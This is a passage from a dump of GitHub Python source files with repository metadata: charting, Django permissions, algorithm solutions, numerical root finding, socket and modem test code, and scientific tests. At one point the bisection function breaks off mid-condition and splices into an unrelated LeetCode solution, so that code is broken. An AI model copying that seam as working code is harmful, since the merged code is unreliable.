casesData2[Countries]\ncasesData4 = casesData3.iloc[150:,:]\n\n# Adding moving average\n#casesData4['pandas_SMA_3'] = casesData3.iloc[:,[0]].rolling(window=3).mean()\n\ncasesData5= casesData3.iloc[:, 1:5]\ncasesData6= casesData5.diff()\n\nax = casesData4.plot(lw=1, colormap='jet', marker='.', markersize=4,title='Covid-19 Cases')\nax.set_xlabel('Date')\nax.set_ylabel('Number of Cases')\nax.set_facecolor('gainsboro')\n\n\nplt.grid()\nplt.savefig('charts/Spain_UK_Jan21.png')\nplt.show()\n\n\n\n\n","repo_name":"scienceMiner/pythonCovid19Charts","sub_path":"python.datascience.views/src/SpainVsUKAfter150Days.py","file_name":"SpainVsUKAfter150Days.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"28707110030","text":"from rest_framework.permissions import BasePermission\nfrom .models import Comments, Contributors, Issues, Projects, Users\n\n\nclass IsAuthenticatedProjectAuthor(BasePermission):\n    \"\"\"\n    Allow access to the projects view if user is Authenticated\n    Project Author can create, get, modify or delete\n    Contributors can only get or create\n    \"\"\"\n    message = 'Editing projects is restricted to the author only!'\n    author_methods = ['GET', 'POST', 'PUT', 'DELETE']\n    base_methods = ['GET', 'POST']\n\n    def has_permission(self, request, view):\n        if request.user.is_authenticated:\n            return True\n\n    def has_object_permission(self, request, view, obj):\n        if request.user.is_authenticated:\n            contributors = Contributors.objects.filter(project_id=obj.id)\n            if request.user == obj.author_user_id:\n                if request.method in self.author_methods:\n                    return True\n            elif contributors.filter(user_id=request.user).exists():\n                if request.method in self.base_methods:\n                    return True\n            else:\n                print(\"you're not this project's author or contributor\")\n\n\nclass IsProjectAuthorOrContributor(BasePermission):\n    \"\"\"\n    Allow access to the contributors view if user is Authenticated and author or contributor\n    Project Author can create, get, modify or delete contributors\n    Contributors can only get information\n    \"\"\"\n    message = 'you should be authenticated and Author or contributor of an existing project!'\n    message_project_not_exist = 'This project does not exist'\n    author_object_methods = ['GET', 'POST', 'PUT', 'DELETE']\n    contributor_methods = ['GET', ]\n\n    def has_permission(self, request, view):\n        if request.user.is_authenticated:\n            try:\n                actual_project = Projects.objects.get(pk=view.kwargs['projects_pk'])\n            except :\n                return False\n            author = actual_project.author_user_id\n            contributors = Contributors.objects.filter(project_id=actual_project.id)\n            if request.user == author:\n                return True\n            elif contributors.filter(user_id=request.user).exists():\n                return True\n\n    def has_object_permission(self, request, view, obj):\n        if request.user.is_authenticated:\n            actual_project = Projects.objects.get(pk=view.kwargs['projects_pk'])\n            author = actual_project.author_user_id\n            contributors = Contributors.objects.filter(project_id=actual_project.id)\n            if request.user == author:\n                if request.method in self.author_object_methods:\n                    return True\n            elif contributors.filter(user_id=request.user).exists():\n                if request.method in self.contributor_methods:\n                    return True\n\n\nclass IsIssueAuthorOrAssignee(BasePermission):\n    \"\"\"\n    Allow access to the issues view if user is Authenticated and,\n    author or contributors of the related project\n    Issue Author can create, get, modify or delete contributors\n    Contributors can only get and post Issues\n    \"\"\"\n    message = 'you should be authenticated and this issue author or assignee!'\n    author_object_methods = ['GET', 'POST', 'PUT', 'DELETE']\n    base_methods = ['GET', 'POST']\n\n    def has_permission(self, request, view):\n        if request.user.is_authenticated:\n            self.actual_project = Projects.objects.get(pk=view.kwargs['projects_pk'])\n            self.project_author = self.actual_project.author_user_id\n            self.project_contributors = Contributors.objects.filter(project_id=self.actual_project.id)\n            if request.user == self.project_author:\n                return True\n            elif self.project_contributors.filter(user_id=request.user).exists():\n                return True\n            else:\n                print('you are not associated with this project')\n\n    def has_object_permission(self, request, view, obj):\n        if request.user.is_authenticated:\n            actual_issue = Issues.objects.get(pk=view.kwargs['pk'])\n            issue_author = actual_issue.author_user_id\n            assignee = Users.objects.get(id=actual_issue.assignee_user_id.id)\n            if request.user == issue_author:\n                if request.method in self.author_object_methods:\n                    return True\n            elif request.user == assignee:\n                if request.method in self.base_methods:\n                    return True\n            else:\n                print('you are not associated with this issue')\n\n\nclass IsCommentAuthor(BasePermission):\n    \"\"\"\n    Allow access to the issues view if user is Authenticated and,\n    author or Assignee of the related issue\n    Comment Author can create, get, modify or delete Comment\n    Related issue members can only get and post Comment\n    \"\"\"\n    message = 'you should be authenticated and Author or contributor!'\n    author_object_methods = ['GET', 'POST', 'PUT', 'DELETE']\n    base_methods = ['GET', 'POST']\n\n    def has_permission(self, request, view):\n        if request.user.is_authenticated:\n            self.actual_issue = Issues.objects.get(pk=view.kwargs['issues_pk'])\n            self.issue_author = self.actual_issue.author_user_id\n            self.assignee = Users.objects.get(id=self.actual_issue.assignee_user_id.id)\n            if request.user == self.issue_author:\n                return True\n            elif request.user == self.assignee:\n                return True\n            else:\n                print('you are not associated with this issue')\n\n    def has_object_permission(self, request, view, obj):\n        if request.user.is_authenticated:\n            actual_comment = Comments.objects.get(pk=view.kwargs['pk'])\n            comment_author = actual_comment.author_user_id\n            if request.user == comment_author:\n                if request.method in self.author_object_methods:\n                    print('issue member, comment author')\n                    return True\n            else:\n                if request.method in self.base_methods:\n                    print('issue member alone')\n                    return True\n","repo_name":"Satupathe/OC-P10-AG","sub_path":"SoftProjects/projects/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":6131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1660279156","text":"\"\"\"\nTitle : 가르침\nLink : https://www.acmicpc.net/problem/1062\n\"\"\"\n\nfrom itertools import combinations\nimport sys\ninput = sys.stdin.readline\n\n\ndef solution():\n    N, K = map(int, input().split())\n    alphabets = {'a', 'c', 'i', 'n', 't'}\n\n    words = []\n    additional_alphabets = set()\n    for _ in range(N):\n        word = input().strip()[4:-4]\n        word = set(s for s in word) - alphabets\n        words.append(word)\n        additional_alphabets |= word\n\n    limit = K - 5\n    if limit < 0:\n        print(0)\n        return\n    if len(list(additional_alphabets)) <= limit:\n        ans = N\n    else:\n        ans = 0\n        for comb in list(combinations(additional_alphabets, limit)):\n            count = 0\n            comb = set(comb)\n            for word in words:\n                for s in word:\n                    if s not in comb:\n                        break\n                else:\n                    count += 1\n            if ans < count:\n                ans = count\n    
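    # Editor's note (annotation, not part of the original source): this is brute
    # force over letter subsets. With at most 21 candidate letters beyond the
    # mandatory a, c, i, n, t, scoring every C(21, K-5) combination stays fast
    # enough for this problem's limits.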
print(ans)\n return\n\n\nsolution()\n","repo_name":"mintropy/algorithm_pulzo","sub_path":"이영준/2022/02/0228/1062.py","file_name":"1062.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"25278965957","text":"import numpy as np\n\nclass Iteration1D:\n def __init__(self,f,method):\n # Define self attributes\n self.f = f\n self.method = method\n\n # Initialize initial interval for bisection\n self.a = None\n self.b = None\n\n # Initialize initial guess\n self.p0 = None\n\n # Initialize tolerance and max iterations\n self.tol = None\n self.Nmax = None\n\n # Initialize info message\n self.info = None\n\n # Initialize root\n self.pstar = None\n\n # Initialize iters for Newton or fixedpt\n self.p_iters = None\n\n # Initialize save_all variables\n self.save_all = False\n\n # Initialize vector of all guesses\n self.p = None\n\n # Initialize error type to absolute by default\n self.error = 'absolute'\n\n # Define root-finding functions\n def root(self):\n # Reset self.info\n self.info = None\n\n if self.method == 'bisection':\n if self.a is None:\n self.info = \"ERROR: Initial interval not fully defined. Please define a valid value for the beginning of the interval, a\"\n self.pstar = None\n elif self.b is None:\n self.info = \"ERROR: Initial interval not fully defined. Please define a valid value for the end of the interval, b\"\n self.pstar = None\n elif self.tol is None:\n self.info = \"ERROR: tolerance not defined. Please define a valid value for tol\"\n self.pstar = None\n elif self.Nmax is None:\n self.info = \"ERROR: Max iterations not specified. Please define Nmax\"\n self.pstar = None\n else:\n # Run bisection method\n [self.pstar, self.ier] = bisection(self.f, self.a, self.b, self.tol, self.Nmax, self.error)\n\n # Classify error message\n if self.ier == 1:\n self.info = \"ERROR: No root in initial interval\"\n self.pstar = None\n elif self.ier == 2:\n self.info = \"ERROR: Exceeded max iterations. Root not found to specified tolerance\"\n self.pstar = None\n elif self.ier == 3:\n self.info = \"ERROR: Root not found\"\n self.pstar = None\n elif self.ier == 4:\n self.info = \"ERROR: Invalid error type\"\n self.pstar = None\n elif self.method == 'fixedpt':\n if self.p0 is None:\n self.info = \"ERROR: No initial guess. Please define x0\"\n self.pstar = None\n elif self.tol is None:\n self.info = \"ERROR: tolerance not defined. Please define a valid value for tol\"\n self.pstar = None\n elif self.Nmax is None:\n self.info = \"ERROR: Max iterations not specified. Please define Nmax\"\n self.pstar = None\n else:\n # Run fixed point method\n if self.save_all:\n [self.pstar,self.ier,self.p] = fixedpt(self.f,self.p0,self.tol,self.Nmax,self.save_all,self.error)\n else:\n [self.pstar,self.ier] = fixedpt(self.f,self.p0,self.tol,self.Nmax,self.save_all,self.error)\n\n # Classify error message\n if self.ier == 1:\n self.info = \"ERROR: Exceeded max iterations. Root not found to specified tolerance\"\n self.pstar = None\n if self.ier == 2:\n self.info = \"ERROR: Invalid error type\"\n self.pstar = None\n else:\n self.info = \"ERROR: Incorrect method type. 
Please select either 'bisection' or 'fixedpt.'\"\n self.pstar = None\n \n # Print error statement if it exists\n if self.info is not None:\n print(self.info)\n \n # Return the root\n return self.pstar\n\ndef bisection(f,a,b,tol,Nmax,error):\n '''\n Inputs:\n f,a,b - function and endpoints of initial interval\n tol, Nmax - bisection stops when interval length < tol\n - or if Nmax iterations have occured\n error - error type\n Returns:\n astar - approximation of root\n ier - error message\n - ier = 1 => cannot tell if there is a root in the interval\n - ier = 0 == success\n - ier = 2 => ran out of iterations\n - ier = 3 => other error ==== You can explain\n '''\n\n ''' first verify there is a root we can find in the interval '''\n ier = 0\n fa = f(a); fb = f(b)\n if (fa*fb>0):\n ier = 1\n astar = a\n return [astar, ier]\n\n ''' verify end point is not a root '''\n if (fa == 0):\n astar = a\n ier =0\n return [astar, ier]\n\n if (fb ==0):\n astar = b\n ier = 0\n return [astar, ier]\n\n count = 0\n while (count < Nmax):\n c = 0.5*(a+b)\n fc = f(c)\n\n if (fc == 0):\n astar = c\n ier = 0\n print(\"The algorithm converged in \" + str(count) + \" iterations!\")\n return [astar, ier]\n\n if (fa*fc<0):\n b = c\n elif (fb*fc<0):\n a = c\n fa = fc\n else:\n astar = c\n ier = 3\n return [astar, ier]\n\n if error == 'absolute':\n if (abs(b-a) int:\n def nextPermutation(nums: List[int]):\n n = len(nums)\n\n # From back to front, find the first num < nums[i + 1]\n i = n - 2\n while i >= 0:\n if nums[i] < nums[i + 1]:\n break\n i -= 1\n\n # From back to front, find the first num > nums[i], swap it with nums[i]\n if i >= 0:\n for j in range(n - 1, i, -1):\n if nums[j] > nums[i]:\n nums[i], nums[j] = nums[j], nums[i]\n break\n\n def reverse(nums, l, r):\n while l < r:\n nums[l], nums[r] = nums[r], nums[l]\n l += 1\n r -= 1\n\n # Reverse nums[i + 1..n - 1]\n reverse(nums, i + 1, len(nums) - 1)\n\n A = [int(c) for c in num] # Original\n B = A.copy() # Permutated\n\n for _ in range(k):\n nextPermutation(B)\n\n def countSteps(A: List[int], B: List[int]) -> int:\n count = 0\n\n j = 0\n for i in range(len(A)):\n j = i\n while A[i] != B[j]:\n j += 1\n while i < j:\n B[j], B[j - 1] = B[j - 1], B[j]\n j -= 1\n count += 1\n\n return count\n\n return countSteps(A, B)\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/1850. 
Minimum Adjacent Swaps to Reach the Kth Smallest Number/1850.py","file_name":"1850.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"37671161200","text":"# Echo server\n\n# Importing Libraries\nimport socket\nimport sys\nimport struct\nimport array\n\nclass environment():\n\t\n\t# Connection for sender socket\n\tglobal sendConn\n\tsendHost = 'localhost' # Symbolic name meaning all available interfaces\n\tsendPort = 50000 # Arbitrary non-privileged port\n\t# Connection for receiver socket\n\tglobal recvConn\n\trecvHost = 'localhost' # Symbolic name meaning all available interfaces\n\trecvPort = 50001 # Arbitrary non-privileged port\n\tglobal last_data\n\t\n\t# Creating server Socket\n\tdef createServerSockets(self):\n\t\t\n\t\t# Calling socket creater methods\n\t\tself.createSendServerSocket()\n\t\tself.createRecvServerSocket()\n\n\tdef createSendServerSocket(self):\n\t\t# Creating server Socket location\n\t\tserverSocketS = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\ttry:\n\t\t\tserverSocketS.bind((self.sendHost, self.sendPort))\n\t\texcept:\n\t\t\tprint('Bind failed.')\n\t\t\tsys.exit()\n\t\tprint ('Socket bind complete')\n\t\t# Enable listening\n\t\tserverSocketS.listen(1)\n\t\tprint ('Socket now listening')\n\t\t\n\t\t# Wait for client connection\n\t\tprint ('waiting 10 seconds for response from client at sender port ',self.sendPort)\n\t\tserverSocketS.settimeout(10)\n\t\ttry:\n\t\t\tself.sendConn, addr = serverSocketS.accept()\n\t\texcept socket.timeout:\n\t\t\tprint('No connection, program terminated')\n\t\t\tsys.exit()\n\t\tprint ('Connected by', addr,'on sender port',self.sendPort)\n\t\t\n\t\t\n\t\t# Create socket for receiving\n\t\t\n\t\t# Creating server Socket\n\tdef createRecvServerSocket(self):\n\t\t# Creating server Socket location\n\t\tserverSocketR = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\ttry:\n\t\t\tserverSocketR.bind((self.recvHost, self.recvPort))\n\t\texcept:\n\t\t\tprint('Bind failed.')\n\t\t\tsys.exit()\n\t\tprint ('Socket bind complete')\n\t\t# Enable listening\n\t\tserverSocketR.listen(1)\n\t\tprint ('Socket now listening')\n\t\t\n\t\t# Wait for client connection\n\t\tprint ('waiting for response from client at receiver port ',self.recvPort)\n\t\tself.recvConn, addr = serverSocketR.accept()\n\t\tprint ('Connected by', addr,'on receiver port',self.recvPort)\n\t\n\tdef receiveState(self):\n\t\t# Receive state formed as binary array\n\t\tdata = self.recvConn.recv(2048);\n\t\t# decode state\n\t\treturn self.decodeState(data)\n\n\tdef decodeState(self, data):\n\t\t# Unpack from hex (binary array) to double\n\t\ttry:\n\t\t\tdata = array.array('d',data)\n\t\texcept: \n\t\t\tdata = self.last_data\n\n\t\treturn data\n\t\t\n\tdef sendAction(self, msg):\n\t\tmsg = struct.pack(\"I\",msg)\n\t\tself.sendConn.sendall(msg)#.encode('utf-8'))\t","repo_name":"maczikasz/eligibility_pump","sub_path":"world/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37007172455","text":"from gui.app import SampleApp\nfrom entities.database import DataBase\nimport sqlite3\nfrom database import CreateDataBase\n\n\n\nif __name__ == \"__main__\":\n decision = input(\"Do you want to create the database? 
Y/N\")\n main_db = DataBase(\n name=\"main_database.db\",\n tables={\n \"stakeholders\": ['Name', 'Needs', 'Parent'],\n \"needs\": ['name', 'Description', 'Stakeholder', 'Requirements'],\n \"requirements\": ['Name', 'Description', 'Priority', 'Type', 'Source', 'Version', 'Author']}\n )\n if decision == \"Y\":\n CreateDataBase(main_db)\n\n app = SampleApp(main_db)\n\n app.mainloop()\n","repo_name":"0110lekniw/chare_v2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74493561654","text":"from obsidian.module import Module, AbstractModule, Dependency\nfrom obsidian.cpe import CPE\n\n\n@Module(\n \"InstantMOTD\",\n description=\"Indicates a client supports receiving Server Identification packets at any time, not just before a map is sent.\",\n author=\"Obsidian\",\n version=\"1.0.0\",\n dependencies=[Dependency(\"core\")]\n)\n@CPE(\n extName=\"InstantMOTD\",\n extVersion=1,\n cpeOnly=True\n)\nclass InstantMOTDModule(AbstractModule):\n def __init__(self, *args):\n super().__init__(*args)\n","repo_name":"EdwardJXLi/ProjectObsidian","sub_path":"obsidian/modules/cpe/instantmotd.py","file_name":"instantmotd.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"19024199560","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport numpy as np\n\nimport cellconstructor as CC\nimport cellconstructor.Phonons\nimport cellconstructor.symmetries\n\nimport sys, os\nimport pytest\n\n@pytest.mark.parametrize(\"FILDYN, NQIRR\", [(\"Sym.dyn.\", 3), (\"skydyn_\", 4)])\ndef test_symmetries_supercell(FILDYN, NQIRR):\n\n total_path = os.path.dirname(os.path.abspath(__file__))\n os.chdir(total_path)\n\n\n dynmat = CC.Phonons.Phonons(FILDYN, NQIRR)\n SUPERCELL = dynmat.GetSupercell()\n\n # Compute the frequencies\n supercell_dyn = dynmat.GenerateSupercellDyn(SUPERCELL)\n w1, pols = supercell_dyn.DyagDinQ(0)\n\n # Show the modes for each q point\n for i,q in enumerate(dynmat.q_tot):\n print (\"Dyagonalizing:\", q)\n w, p = dynmat.DyagDinQ(i)\n print (\" \".join([\"%.4f cm-1 \" % (x * CC.Phonons.RY_TO_CM) for x in w]))\n\n #dynmat.Symmetrize()\n # # Test the symmetrization\n qe_sym = CC.symmetries.QE_Symmetry(dynmat.structure)\n\n fc_dynmat_start = np.array(dynmat.dynmats)\n\n\n after_sym = fc_dynmat_start.copy()\n qe_sym.SymmetrizeFCQ(after_sym, dynmat.q_stars, verbose = True)\n for i,q in enumerate(dynmat.q_tot):\n dynmat.dynmats[i] = after_sym[i,:,:]\n\n # Show the modes for each q point\n for i,q in enumerate(dynmat.q_tot):\n print (\"After Dyagonalizing:\", q)\n w, p = dynmat.DyagDinQ(i)\n print (\" \".join([\"%.4f cm-1 \" % (x * CC.Phonons.RY_TO_CM) for x in w]))\n\n # Print the difference between before and after the symmetrization\n print ()\n print (\"Difference of the symmetrization:\")\n print (np.sqrt( np.sum( (after_sym - fc_dynmat_start)**2 ) / np.sum(after_sym*fc_dynmat_start)))\n\n # print \"\"\n\n # Now lets try to randomize the matrix\n #new_random = np.random.uniform( size = np.shape(fc_dynmat_start)) + 1j*np.random.uniform( size = np.shape(fc_dynmat_start))\n\n # print \"Saving a not symmetrized random matrix to Random.dyn.IQ, where IQ is the q index\"\n # # Lets save the new matrix in QE format\n # for i, q in enumerate(dynmat.q_tot):\n # dynmat.dynmats[i] = new_random[i, :, :]\n # dynmat.save_qe(\"Random.dyn.\")\n\n # # Lets 
constrain the symmetries\n # # We use asr = crystal to force the existence of the acustic modes in Gamma\n # qe_sym.SymmetrizeFCQ(new_random, np.array(dynmat.q_stars), asr = \"no\")\n\n # # Lets save the new matrix in QE format\n # for i, q in enumerate(dynmat.q_tot):\n # dynmat.dynmats[i] = new_random[i, :, :]\n\n # print \"Saving a symmetrized random matrix to Sym.dyn.IQ, where IQ is the q index\"\n # dynmat.save_qe(\"Sym.dyn.\")\n # print \"\"\n\n # Compute the frequencies\n supercell_dyn = dynmat.GenerateSupercellDyn(SUPERCELL)\n w, pols = supercell_dyn.DyagDinQ(0)\n # Get the translations\n t = CC.Methods.get_translations(pols, supercell_dyn.structure.get_masses_array())\n\n dynmat.Symmetrize()\n # Compute the frequencies\n supercell_dyn = dynmat.GenerateSupercellDyn(SUPERCELL)\n w3, pols = supercell_dyn.DyagDinQ(0)\n # Get the translations\n t = CC.Methods.get_translations(pols, supercell_dyn.structure.get_masses_array())\n\n\n # Make the assert test\n for i, _w_ in enumerate(w):\n w2 = w3[i]\n\n assert np.abs(_w_ - w2) < 1e-8\n\n # print \"Frequencies:\"\n # print \"\\n\".join([\"%.4f cm-1 | %.4f cm-1 | %.4f cm-1 T: %d\" % (w1[i]*CC.Phonons.RY_TO_CM, w[i]*CC.Phonons.RY_TO_CM, w3[i]*CC.Phonons.RY_TO_CM, t[i]) for i in range(len(w))])\n # print \"\"\n # print \"Done.\"\n\n\nif __name__ == \"__main__\":\n test_symmetries_supercell(\"Sym.dyn.\", 3)\n","repo_name":"SSCHAcode/CellConstructor","sub_path":"tests/TestSymmetriesSupercell/test_symmetries_supercell.py","file_name":"test_symmetries_supercell.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"13537258702","text":"import os\nimport glob\nimport numpy as np\nfrom pyntcloud import PyntCloud\nfrom collections import defaultdict\nfrom tqdm import tqdm\nfrom itertools import cycle\nfrom torch.multiprocessing import Pool\n\ndef partition(filename, args):\n # partition.\n point_cloud = PyntCloud.from_file(filename)\n pc_xyz = point_cloud.points.values[:, :3]\n\n # partition point cloud to cubes.\n cubes = defaultdict(list)\n for point in pc_xyz:\n cube_index = tuple((point//args.cube_size).astype(\"int\"))\n local_point = point % args.cube_size # np.array\n cubes[cube_index].append(local_point)\n list_item = list(cubes.keys())\n for item in list_item:\n if len(cubes[item]) < args.min_num:\n del cubes[item]\n return cubes\n\ndef write_cubes(cubes, args, name):\n items = os.path.basename(name).replace('.ply', '').split('_')\n if 'enc' in name:\n category = items[-2]\n frame = items[-3].zfill(8)\n squence = items[1]\n else:\n category = 'gt'\n squence = items[0]\n frame = items[-1].zfill(8)\n result_dir = '{}/{}/{}'.format(category, squence, frame)\n result_dir = os.path.join(args.save_dir, result_dir)\n if not os.path.exists(result_dir):\n os.makedirs(result_dir)\n for item in cubes:\n name = [str(item).zfill(3) for item in item]\n name = os.path.join(result_dir, '_'.join(name)+'.txt')\n array = np.vstack(cubes[item]).astype(np.int32)\n np.savetxt(name, array, '%d')\n\ndef run(data):\n filename, args = data\n cubes = partition(filename, args)\n write_cubes(cubes, args, filename)\n\nif __name__=='__main__':\n import argparse\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--source_dir\", type=str, default=\"./example\")\n parser.add_argument(\"--save_dir\", type=str, default=\"./data\")\n parser.add_argument(\"--cube_size\", type=int, default=64)\n 
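    # Editor's note (annotation, not part of the original source): min_num, just
    # below, drops cubes holding fewer points than the threshold, and workers
    # sizes the multiprocessing Pool used for the conversion.
    # Example invocation (paths are illustrative, not from the original repo):
    #   python util/split_point_cloud.py --source_dir ./example --cube_size 64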
parser.add_argument(\"--min_num\", type=int, default=3)\n parser.add_argument('--workers', type=int, default=20)\n args = parser.parse_args()\n\n point_cloud_dirs = sorted(glob.glob(os.path.join(args.source_dir, '*.ply')))\n\n pool = Pool(args.workers)\n args_list = cycle([args])\n for data in tqdm(pool.imap_unordered(run, zip(point_cloud_dirs, args_list))):\n None \n","repo_name":"fxqzb/Deep-Geometry-Post-Processing","sub_path":"util/split_point_cloud.py","file_name":"split_point_cloud.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"352960679","text":"from unittest.mock import patch, call\nimport pytest\nimport sys\n\nfrom Hologram.Network.Modem.Quectel import Quectel\nfrom Hologram.Network.Modem.Modem import Modem\nfrom UtilClasses import ModemResult\n\nsys.path.append(\".\")\nsys.path.append(\"..\")\nsys.path.append(\"../..\")\n\n\ndef mock_write(modem, message):\n return True\n\n\ndef mock_read(modem):\n return True\n\n\ndef mock_readline(modem, timeout=None, hide=False):\n return \"\"\n\n\ndef mock_open_serial_port(modem, device_name=None):\n return True\n\n\ndef mock_close_serial_port(modem):\n return True\n\n\ndef mock_detect_usable_serial_port(modem, stop_on_first=True):\n return \"/dev/ttyUSB0\"\n\n\n@pytest.fixture\ndef no_serial_port(monkeypatch):\n monkeypatch.setattr(Quectel, \"_read_from_serial_port\", mock_read)\n monkeypatch.setattr(Quectel, \"_readline_from_serial_port\", mock_readline)\n monkeypatch.setattr(Quectel, \"_write_to_serial_port_and_flush\", mock_write)\n monkeypatch.setattr(Quectel, \"openSerialPort\", mock_open_serial_port)\n monkeypatch.setattr(Quectel, \"closeSerialPort\", mock_close_serial_port)\n monkeypatch.setattr(Quectel, \"detect_usable_serial_port\", mock_detect_usable_serial_port)\n\n\ndef test_init_Quectel_no_args(no_serial_port):\n modem = Quectel()\n assert modem.timeout == 1\n assert modem.socket_identifier == 0\n assert modem.chatscript_file.endswith(\"/chatscripts/default-script\")\n assert modem._at_sockets_available\n\n@patch.object(Quectel, \"check_registered\")\n@patch.object(Quectel, \"set\")\n@patch.object(Quectel, \"command\")\ndef test_create_socket(mock_command, mock_set, mock_check, no_serial_port):\n modem = Quectel()\n modem.apn = 'test'\n mock_check.return_value = True\n # The PDP context is not active\n mock_command.return_value = (ModemResult.OK, '+QIACT: 0,0')\n mock_set.return_value = (ModemResult.OK, None)\n modem.create_socket()\n mock_command.assert_called_with(\"+QIACT?\")\n mock_set.assert_has_calls(\n [\n call(\"+QICSGP\", '1,1,\\\"test\\\",\\\"\\\",\\\"\\\",1'),\n call(\"+QIACT\", '1', timeout=30)\n ],\n any_order=True\n )\n\n@patch.object(Quectel, \"command\")\ndef test_connect_socket(mock_command, no_serial_port):\n modem = Quectel()\n modem.socket_identifier = 1\n host = \"hologram.io\"\n port = 9999\n modem.connect_socket(host, port)\n mock_command.assert_called_with(\"+QIOPEN\", '1,0,\"TCP\",\"%s\",%d,0,1' % (host, port))\n\n\n@patch.object(Quectel, \"set\")\ndef test_write_socket_small(mock_command, no_serial_port):\n modem = Quectel()\n modem.socket_identifier = 1\n data = b\"Message smaller than 510 bytes\"\n mock_command.return_value = (ModemResult.OK, None)\n modem.write_socket(data)\n mock_command.assert_called_with(\n \"+QISENDEX\",\n '1,\"4d65737361676520736d616c6c6572207468616e20353130206279746573\"',\n timeout=10,\n )\n\n\n@patch.object(Quectel, \"set\")\ndef test_write_socket_large(mock_command, 
no_serial_port):\n    modem = Quectel()\n    modem.socket_identifier = 1\n    data = b\"a\" * 300\n    mock_command.return_value = (ModemResult.OK, None)\n    modem.write_socket(data)\n    mock_command.assert_has_calls(\n        [\n            call(\"+QISENDEX\", '1,\"%s\"' % (\"61\" * 255), timeout=10),\n            call(\"+QISENDEX\", '1,\"%s\"' % (\"61\" * 45), timeout=10),\n        ],\n        any_order=True,\n    )\n\n@patch.object(Quectel, \"set\")\ndef test_read_socket(mock_command, no_serial_port):\n    modem = Quectel()\n    modem.socket_identifier = 1\n    mock_command.return_value = (ModemResult.OK, '+QIRD: \"Some val\"')\n    # Double quotes should be stripped from the return value\n    assert (modem.read_socket(payload_length=10) == 'Some val')\n    mock_command.assert_called_with(\"+QIRD\", '1,10')\n\ndef test_handle_open_urc(no_serial_port):\n    modem = Quectel()\n    modem.handleURC('+QIOPEN: 1,0')\n    assert modem.urc_state == Modem.SOCKET_WRITE_STATE\n    assert modem.socket_identifier == 1\n\ndef test_handle_received_data_urc(no_serial_port):\n    modem = Quectel()\n    modem.handleURC('+QIURC: \\\"recv\\\",1,25')\n    assert modem.urc_state == Modem.SOCKET_SEND_READ\n    assert modem.socket_identifier == 1\n    assert modem.last_read_payload_length == 25\n    assert modem.urc_response == \"\"\n\ndef test_handle_socket_closed_urc(no_serial_port):\n    modem = Quectel()\n    modem.handleURC('+QIURC: \\\"closed\\\",1')\n    assert modem.urc_state == Modem.SOCKET_CLOSED\n    assert modem.socket_identifier == 1\n\n","repo_name":"hologram-io/hologram-python","sub_path":"tests/Modem/test_Quectel.py","file_name":"test_Quectel.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"21"} +{"seq_id":"23093647619","text":"import pandas as pd\nimport random\n\n\ndef EdgeSwap():\n    df = pd.read_csv(\"../../Gephi/Gephi_Edge_List.csv\")\n    #df = pd.read_csv(\"./test_data.csv\")\n\n    print('Starting edge swap')\n\n    all_ids = list(range(0, len(df)))\n\n    new_data = []\n\n    MAX_ATTEMPTS = 10\n\n    while len(all_ids) > 1:\n        if(MAX_ATTEMPTS <= 0):\n            break\n\n        rand_i1 = random.randint(0,len(all_ids)-1)\n        v1 = all_ids[rand_i1]\n        all_ids.pop(rand_i1)\n\n        rand_i2 = random.randint(0,len(all_ids)-1)\n        v2 = all_ids[rand_i2]\n        all_ids.pop(rand_i2)\n\n        if(df.iloc[v1]['Source'] == df.iloc[v2]['Target']):\n            MAX_ATTEMPTS -= 1\n            continue\n\n        e1 = [df.iloc[v1]['Source'], df.iloc[v2]['Target'], df.iloc[v1]['Weight']]\n        e2 = [df.iloc[v2]['Source'], df.iloc[v1]['Target'], df.iloc[v2]['Weight']]\n\n        new_data.append(e1)\n        new_data.append(e2)\n    \n\n    print(all_ids)\n    # Add any left over edges that cannot be shuffled; all_ids holds the\n    # remaining row indices themselves, so iterate over them directly\n    for v in all_ids:\n        print(\"LEFT OVER ID = \" + str(v))\n        new_data.append([df.iloc[v]['Source'], df.iloc[v]['Target'], df.iloc[v]['Weight']])\n    \n    return new_data","repo_name":"Nunuvin/cryptic_philanthropist","sub_path":"Analysis/Null Model/EdgeSwap.py","file_name":"EdgeSwap.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9893263654","text":"import pytest as _pytest\n\nfrom downforeveryone import useragents\n\n\n@_pytest.mark.parametrize(\"execution_number\", range(20))\ndef test_string_returned(execution_number):\n    result = useragents.random_agent()\n    assert isinstance(result, str)\n\n\ndef test_random_called_once(mocker):\n    random_choice = mocker.patch(\"random.choice\", autospec=True)\n    useragents.random_agent()\n\n    
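    # Editor's note (annotation, not part of the original source): random.choice
    # is patched above, so the test can assert it was consulted exactly once,
    # with the full USER_AGENTS list as its only argument: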
